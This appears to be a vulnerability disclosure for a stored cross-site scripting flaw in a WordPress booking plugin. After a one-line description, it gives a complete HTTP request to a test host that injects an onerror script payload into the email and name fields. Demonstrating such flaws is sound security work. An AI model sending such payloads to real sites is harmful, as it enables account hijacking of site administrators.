It is possible for an unauthenticated user to inject malicious JavaScript into a booking form, which will then be executed when an authenticated user views the booking in the WordPress admin interface.
POST /booking-form/ HTTP/1.1
Host: test.local
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://test.local/booking-form/
Content-Type: multipart/form-data; boundary=---------------------------11713224624340267851833710283
Content-Length: 1809
Connection: close
Cookie: PHPSESSID=fa36a83a2ad7a7fe7b4864024c59bb43; rand_code_1=aa42293c7e2c5cd53a016331a32e4676
Upgrade-Insecure-Requests: 1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_pform_psequence"
_1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_appbooking_pform_process"
1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_appbooking_id"
2
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_ref_page"
http://test.local/booking-form/
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="form_structure_1"
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="refpage_1"
http://test.local/booking-form/
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname1_1"
2019-07-13 12:00/13:00 0 1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname1_1_services"
0
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname1_1_capacity"
0
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="tcostfieldname1_1"
1.00
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="email_1"
"><img src=x onerror=alert(1)><"
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname2_1"
"><img src=x onerror=alert(2)><"
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="hdcaptcha_cp_appbooking_post"
auvoe
-----------------------------11713224624340267851833710283--